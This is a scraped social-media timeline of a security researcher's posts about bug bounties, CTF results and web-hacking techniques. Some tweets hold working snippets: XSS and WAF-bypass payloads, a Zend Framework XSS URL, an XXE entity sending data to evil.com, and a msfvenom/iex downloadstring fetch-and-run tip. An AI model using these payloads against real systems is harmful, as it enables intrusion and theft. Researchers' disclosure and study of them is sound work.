celesian (@c3l3si4n)
2,637 Followers, 384 Following, 171 Media, 1,997 Statuses
Joined June 2019
@c3l3si4n
celesian
2 years
This new trick for turning any PHP LFI to RCE is awesome! I've been wondering why it didn't get more attention since it works better than any other LFI2RCE technique out there (such as expect://). Props to @loknop for publishing this technique initially👏
@c3l3si4n
celesian
3 years
Google's ReCAPTCHA will automatically fingerprint Burp Suite Proxy and raise the challenge difficulty to the maximum, making analysis of the app very irritating. To fix this, go into your Burp Suite Project Configurations and activate TLS Passthrough for
@c3l3si4n
celesian
3 years
Nuclei < v2.5.2 was vulnerable to RCE. I found that you could achieve RCE by using a malicious .yaml template and exploiting nuclei's headless browser feature, which runs with sandbox disabled. Thanks @pdnuclei for the quick update and fix. PoC:
@c3l3si4n
celesian
2 months
thank you @PortSwigger
@c3l3si4n
celesian
11 months
Sharing my experience with alias path traversals on nginx, and how we leaked sensitive data on Bitwarden and GCP with that. Along with that, we also released a tool called navgix to check for the presence of these vulnerabilities in an automated manner.
@c3l3si4n
celesian
2 years
Here's a quick Google dork I've made for finding GitHub profiles of a company's employees. "Seeing something unexpected? Take a look at the GitHub profile guide." "shopify" site:
@c3l3si4n
celesian
2 years
Finally got this.. feels quite underwhelming now.🥳
@c3l3si4n
celesian
3 years
again.. finally..
@c3l3si4n
celesian
2 years
Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! For this bug, I pulled recon data from @trick3st and ran some automations of my own to detect sensitive information on all programs in the repository.
@c3l3si4n
celesian
5 months
This is a very unknown technique. Tried googling it and found no results, so maybe even a novelty. This allows you to dump all domains from a Cloudflare user by doing nameserver correlation. Great for finding base domains owned by the company.
@c3l3si4n
celesian
2 years
Just reported my first HTTP Request smuggling on @Hacker0x01 . Thanks to @albinowax for his amazing research and for sharing with us the new CL.0/H2.0 vector! 😄😄
@c3l3si4n
celesian
7 months
If you're not using quickcert, you may be missing out on quite a lot of subdomains depending on your target 🔥 Running quickcert led me to finding 1186 new subdomains that were not found by subfinder's APIs. Long hail alternate subdomain enumeration methods 😃
@c3l3si4n
celesian
8 months
A better way of querying certificate transparency logs
@c3l3si4n
celesian
1 year
Here's a quick XSS 0day for Zend Framework 1.*. It was considered deprecated in 2016, but there are still 132533 installs on composer. /vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>
@c3l3si4n
celesian
2 months
Just finished 3rd place, out of 9186 players on this last HackTheBox season. Falling just behind @xct_de and @snowscan . Thank you very much for the competition @hackthebox_eu ! Keeping this pace going was not very healthy suffice to say 🤪
@c3l3si4n
celesian
2 years
turning a DOM Open Redirect into an XSS with the following trick:
var callback_url = " javascript:alert(1)"; // <--- reflected parameter
document.location.href = callback_url;
@c3l3si4n
celesian
10 months
throwback to the coolest PoC video I've sent (v8 rce on mordhau)
@c3l3si4n
celesian
3 years
A great way to find out more about the infrastructure of a website when doing a pentest: put this e-mail address on a sign-up form: attacker@<your vps ip>
Then on your VPS run: nc -lvnp 25
Of course, that's not fixable because it's standard behaviour. :))
@c3l3si4n
celesian
3 years
thinking about this..
@c3l3si4n
celesian
2 years
TIL: You can dump cache keys and other Akamai CDN data by sending a request with the Pragma Header to a site that uses Akamai.
@c3l3si4n
celesian
3 years
Today, @thau0x01 and I managed to develop a working PoC code for the new ProxyLogon (CVE-2021-26855) Microsoft Exchange 2019 vulnerability containing a full SSRF to Arbitrary File Write exploit chain. I also have to thank PRIDE Security for the support in this journey. :)
@c3l3si4n
celesian
1 year
🥳🎉🎉🎉
@c3l3si4n
celesian
3 months
First Pro Labs completed! This one being Zephyr! The lab included multiple attacks on AD environments, such as ACL abuse, Relay attacks, Kerberos attacks, Forest/Trust attacks, Network Pivoting, SQL Server attacks, Linux Privilege Escalation and Web Hacking.
@c3l3si4n
celesian
3 years
Adobe filed CVE-2021-40721 for my report, which was an XSS vulnerability I submitted to their VDP program on @Hacker0x01
@c3l3si4n
celesian
1 year
Released a new authenticated RCE for GLPI, specifically its plugin "order" (installed on many systems), which unserialize()'d a $_POST parameter, making RCE possible with a monolog gadget.
@huntrHacktivity
huntr Hacktivity
1 year
pluginsglpi/order disclosed a bug reported by @c3l3si4n - Patch: #hunter #infosec #opensource
@c3l3si4n
celesian
2 years
Submitted a critical report today after some time off ^^, feels good to be back I guess.. Let's hope that's not a dupe. :p
@c3l3si4n
celesian
3 years
Don't get attached to the technical side; hacking isn't everything in our life. Make friends, go out, get to know drugs, HAVE FUN. That was something missing from my life; when I stopped being so lonely, I discovered a new meaning in life.
@c3l3si4n
celesian
3 years
Just got into @SynackRedTeam c:
@c3l3si4n
celesian
3 years
Started doing the Offshore pro labs on @hackthebox_eu , pretty fun and challenging laboratory so far.
@c3l3si4n
celesian
4 months
Subfinder has existed for more than 5 years now, and they added pagination now? How come this issue hasn't been a higher priority earlier? Just imagine the amount of bounties lost due to researchers trusting PDiscovery's tools to do the basics.🤦
@pdiscoveryio
ProjectDiscovery.io
4 months
Wow! Subfinder just got even more powerful with updates for handling multiple data sources, including pagination issues with many of them. We're excited to see what you all find! And thanks to ZuoJunhao and kelvinatorr for first time contributions!
@c3l3si4n
celesian
15 days
Crazy awesome research by @cfreal_ , many CVEs coming from this.
@offensive_con
offensivecon
15 days
Iconv, Set the Charset to RCE: Exploiting the Glibc To Hack the PHP Engine by @cfreal_ now on stage!
@c3l3si4n
celesian
2 years
H2HC was completely insane. So happy to see so many faces I only knew on the internet. It was tiresome but filled with joy and love. Thank you very much guys 🥺
@c3l3si4n
celesian
3 years
Yay I just got my first Bug Bounty, where I was awarded a $750 bounty on @Hacker0x01 ! :)))))) #TogetherWeHitHarder
@c3l3si4n
celesian
3 years
:3
@c3l3si4n
celesian
3 years
The last few days, I've submitted 5 reports to @Hacker0x01 , with 2 being invalid, 1 being a dupe and only 2 reports being accepted. Thank you @pry0cc , @pdiscoveryio and @Burp_Suite for making such awesome tools.
@c3l3si4n
celesian
10 months
The last Mozilla Hall of Fame entry 😋
@c3l3si4n
celesian
16 days
😄😄
@c3l3si4n
celesian
16 days
I'm in Berlin for @offensive_con (thanks @Binary_Gecko ), if anyone wants to hang out and talk about anything, hit me up!
@c3l3si4n
celesian
3 months
Nice machine :)
@HackTheBloods
HackTheBox First Bloods
3 months
celesian got 1st blood owning "root" on Perfection!
@c3l3si4n
celesian
4 years
@nviitt office programs = programmer
@c3l3si4n
celesian
3 years
New patch for my first ever CVE just got released. Thanks to the @OpenVPN team for quick response :)
@c3l3si4n
celesian
3 years
In an internal pentest, always keep an eye out for Java-RMI services. Those have several misconfigurations which can lead to RCE, as well as exporting useful functions (addUser, runCMD) which can be called and accessed by the JDK jprofiler tool.
@c3l3si4n
celesian
3 years
Don't let the internet rush you, no one is posting their failures
@c3l3si4n
celesian
2 years
Yay, I was awarded a $1,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder
@c3l3si4n
celesian
3 years
I made my first blog post, explaining how you can make a self-destruct password on Linux with a few lines of code.
@c3l3si4n
celesian
1 month
Very neat trick!!!
@pilvar222
pilvar
1 month
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks". I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)
@c3l3si4n
celesian
3 years
Blocked: <img src=x onerror=alert(1)>
Bypassed: <x style=animation-name:fadeIn onanimationstart=(function(){g=alert;/**/g(1)})() ></x>
WAF Bypassing can be fun ¯\_(ツ)_/¯
@c3l3si4n
celesian
20 days
@vxunderground MAS has been the go-to way for activating Windows for quite a few years already.
@c3l3si4n
celesian
1 year
I recently developed a minimal rootkit for Linux systems that made use of "KProbes" to hook internal kernel functions. This rootkit was created as a way to show the power of KProbes in rootkits. I greatly used @ryan_elfmaster 's phrack paper as reference.
@c3l3si4n
celesian
2 years
Here's a quality of life improvement for Burp Suite. Install the uBlock Origin extension on Burp's integrated browser, because it will filter most of the useless requests and allow your proxy history to be clear of third-party tracking library requests.
@c3l3si4n
celesian
2 years
A lot of blue-team people use User-Agents as a way to identify and group requests of an attacker. Use that to your advantage and randomize your user-agent on every request.
@c3l3si4n
celesian
3 years
Just got a @SynackRedTeam invite from the recent @hackthebox_eu tournament I participated in. I hope I pass their interview now. :P
@c3l3si4n
celesian
2 months
@hackthebox_eu @snowscan @xct_de you guys got my username wrong 😞
@c3l3si4n
celesian
8 months
Just a reminder that my open-source tool “thankunext” does that automatically.
@vidocsecurity
Vidoc Security Lab
8 months
Find hidden pages and ".js" files in Next.js applications (find what other hunters miss) Opensea as an example 👇 1/5
@c3l3si4n
celesian
2 years
🥳🎉
@HackTheBloods
HackTheBox First Bloods
2 years
celesian got 1st blood owning root on UpDown!
@c3l3si4n
celesian
3 years
ffuf now shows the server response times for each request! this is a huge win for blind attacks :))))
@c3l3si4n
celesian
2 years
Just one small positive thought in the morning can change your whole day.
@c3l3si4n
celesian
2 years
Just published an article about using Twitter in hacking!
@c3l3si4n
celesian
4 years
Today I made my first heap exploit, a use-after-free bug on glibc version 2.27 exploited with a tcache duplication technique. I'd like to thank everyone who helped me with this and gave me tips on how to study or answered questions I had. Keep pwning!
@c3l3si4n
celesian
3 years
This whole recon/automation stuff in Bug Bounty is a huge trap. Don't use one liners from twitter and don't listen to "success" stories. Do your own stuff, come up with your own vectors and techniques. #BugBounty #bugbountytips
@c3l3si4n
celesian
2 years
It was really cool seeing everyone at RoadSec; I had never been to a conference before, so I was happy to see all the faces I had previously only seen on the Internet.
@c3l3si4n
celesian
2 years
😶
@barctf
BirdsArentReal CTF
2 years
Congrats to @c3l3si4n for taking first user blood on Admirer Too @hackthebox_eu ! Look at how happy he is!
@c3l3si4n
celesian
3 years
@GuidedHacking Did you know that if you return a 444 code on nginx, it will drop the connection without returning any response? It might be interesting for fooling the script kiddies.
@c3l3si4n
celesian
3 years
Converting a Masscan output file to ip:port format:
awk -F ' ' '{print($6,":",$4)}' masscan-port-22.txt|tr -d ' '|sed 's/\/.*//g'
@c3l3si4n
celesian
29 days
bae wake up new dompurify bypass released
@cure53berlin
Cure53
29 days
DOMPurify 3.1.1 & 2.5.1 have been released. Both are security releases & should be upgraded to asap. Note: More releases might follow, the mitigated attack is novel. Eternal gratitude goes to @IcesFont for finding, reporting & helping with fixes 🙇
@c3l3si4n
celesian
3 years
Recon is so fun!
@c3l3si4n
celesian
2 years
this BeerOrCoffee is pretty nice, huh
@c3l3si4n
celesian
4 years
Everybody knows .js.map files can allow you to recover your source code, but did you know Chrome now has support for debugging these .map files? (Breakpoints, Variable Monitoring, etc.) #bugbountytips
@c3l3si4n
celesian
3 years
This is not working for you?
<!ENTITY xxe SYSTEM "">]>
Try this:
<!ENTITY xxe SYSTEM "file://evil.com:21/&data;">]>
@c3l3si4n
celesian
3 years
APIs that encrypt request and response bodies are very likely to contain stupid bugs, due to the false sense of security client-side encryption gives.
@c3l3si4n
celesian
1 year
This tool is awesome and will save a lot of time for everyone, doing this work manually was awful 🫥🫥
@podalirius_
Rémi GASCOU (Podalirius)
1 year
(1/3) I've released publicly a new tool/library called #objectwalker that I have been working on for a few months. 🥳 ObjectWalker allows you to find paths into python objects to find interesting targets, in breadth first search or depth first search! ➡️
@c3l3si4n
celesian
3 years
+ msfvenom -f psh + iex downloadstring = great method for getting meterpreter on modern systems
@c3l3si4n
celesian
2 years
From the last few weeks hunting, one thing I noticed is that Marketing Features are usually vulnerable to something. (Tracking JS code leading to XSS, Marketing API tokens exposed on JS, Investor Sites, etc.)
@c3l3si4n
celesian
3 months
lets goooo 🇩🇪🇩🇪🇩🇪🇩🇪 thank you very much for this generous opportunity @Binary_Gecko and @Ronkeybiz ! c you at offensivecon!!
@big0x75
Vinicius Pereira
3 months
In Dec 2023, I had the opportunity to participate and achieve 1st place at @h2hconference CTF! Thanks to my teammates @c3l3si4n , @beescoitu , @_regne , and to all the event staff and partners, especially @bsdaemon and @Binary_Gecko . It was amazing. See you soon in Germany guys🇩🇪!
@c3l3si4n
celesian
2 years
Remembering that this works with default PHP settings, allow_url_include=False and all ^^
@c3l3si4n
celesian
3 years
PoC for the latest Linux Privilege Escalation disclosed by Qualys :DD
@c3l3si4n
celesian
3 years
You don't need to be better than anyone; why spend 90% of the effort to get 1% of the learning? Just get a job in the field and be happy, the end.
@c3l3si4n
celesian
2 years
Made a quick script for mixing wordlists (raft, common, assetnote) into a single wordlist to pipe into content discovery tools. Create your own ultimate master race wordlist :P
@c3l3si4n
celesian
5 months
This can also be used to find all domains seized by the FBI. Leaving that as an exercise to the reader because I don't want to get into a list. 😁
@c3l3si4n
celesian
3 years
Quick fix for Burp Suite sandbox errors:
sudo chown root:root ~/.BurpSuite/burpbrowser/**/chrome-*; sudo chmod +s ~/.BurpSuite/burpbrowser/**/chrome-*
@c3l3si4n
celesian
2 years
Here's some cool unofficial launch options for tweaking your @Burp_Suite , for improving look and feel or performance.
@c3l3si4n
celesian
4 months
@LiveOverflow Yes, that is my point. Never trust tools because sometimes they be lacking something crucial. Just because the tool is famous doesn't mean it's always good of course.
@c3l3si4n
celesian
2 years
TIL: Since 2021, you can use this new LFI2RCE technique with php://filter to write any kind of content without having to upload a file or poison a log in the system. This is a great step from race-conditions and log poisoning.
@c3l3si4n
celesian
2 years
Here I used @joohoi 's ffuf -replay-proxy feature together with SSH forwarding to run network intensive scans on my Contabo VPS for getting matches on my notebook's Burp without losing scan reliability or speed. It works pretty well ;)
@c3l3si4n
celesian
2 years
work 20 minutes, rest 2 hours
@c3l3si4n
celesian
2 years
<svg onload=alert(1)> - escaped by the server
<svg onload=alert(1)< - untouched, xss triggered. #bugbountytips
@c3l3si4n
celesian
3 years
I dedicate my whole career to teteu tutors, who taught me how to use a computer in 2013
@c3l3si4n
celesian
3 years
Happy 24th Birthday to Nmap, may it live to be 124!
@c3l3si4n
celesian
3 years
In April, I submitted 16 vulnerabilities to 10 programs on @Hacker0x01 . #TogetherWeHitHarder
@c3l3si4n
celesian
2 years
Everybody can use this data! It will update very frequently by an automated workflow. One thing I like doing is grabbing a PoC for a recent vulnerability that is trending and checking for vulnerable instances on BB programs.
@trick3st
Trickest
2 years
We have a repository with the details (and POCs) of almost every publicly available CVE! We just added a 🔥 Hottest CVEs 🔥 table to our CVEs repository that shows the most viewed CVEs according to our analytics, and it is updated regularly! Check it 👉